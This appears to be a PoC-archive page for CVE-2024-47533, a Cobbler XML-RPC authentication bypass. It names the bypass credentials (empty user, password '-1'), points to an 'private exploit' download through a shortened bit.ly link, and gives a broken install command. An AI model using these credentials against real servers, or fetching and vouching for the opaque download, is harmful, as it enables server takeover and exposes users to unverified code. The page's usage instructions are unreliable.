Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2024-47533 PoC — Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes

Source
Associated Vulnerability
Title: Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes (CVE-2024-47533)
Description:Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
Description
CVE-2024-47533: Improper Authentication (CWE-287)
Readme
# CVE-2024-47533: Improper Authentication (CWE-287)

## Overview

Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability. This vulnerability gives anyone with network access to a Cobbler server full control of the server. The impact is severe, as it allows unauthorized access with the highest privileges.

## Details
+ CVE ID: CVE-2024-47533
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Vulnerability Description

The issue lies in the `utils.get_shared_secret()` function, which always returns `-1`. This flaw allows anyone to connect to the Cobbler XML-RPC as user `''` with password `-1` and make any changes.


## Affected Versions

This vulnerability affects versions starting from **3.0.0 and prior to versions 3.2.3 and 3.3.7.**

## Usage

```
pip install requirements.txt
python CVE-2024-47533.py
```


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Contact
For inquiries, please contact zetraxz@thesecure.biz

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →